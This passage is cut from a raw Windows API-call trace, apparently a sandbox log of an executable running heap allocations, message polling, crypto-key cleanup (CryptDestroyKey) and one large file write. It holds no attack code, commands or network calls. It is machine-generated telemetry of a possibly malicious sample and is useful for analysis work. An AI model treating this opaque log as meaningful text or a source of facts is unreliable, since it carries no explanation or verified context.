lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0259.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0259.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0259.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0259.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0259.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0259.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0259.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0259.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0259.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55238 [0259.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0259.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0259.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0259.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.302] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.302] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0259.302] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0259.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.302] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.302] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.303] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.303] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.303] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.303] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0259.303] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.303] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.303] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0259.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.311] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0xda10, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0xda10, lpOverlapped=0x0) returned 1 [0259.325] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.325] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0259.326] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0259.326] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0259.326] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.326] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0259.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51b68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0259.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.327] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0259.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.328] CryptDestroyKey (hKey=0xa87390) returned 1 [0259.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0259.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.329] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0259.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.330] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0259.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.330] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0259.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0259.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0259.330] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0259.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0259.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0259.330] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0259.330] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0259.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.330] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.331] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.331] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0259.331] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0259.331] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.331] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.331] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.331] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0259.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.331] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.332] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.332] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.332] PeekMessageW (in: 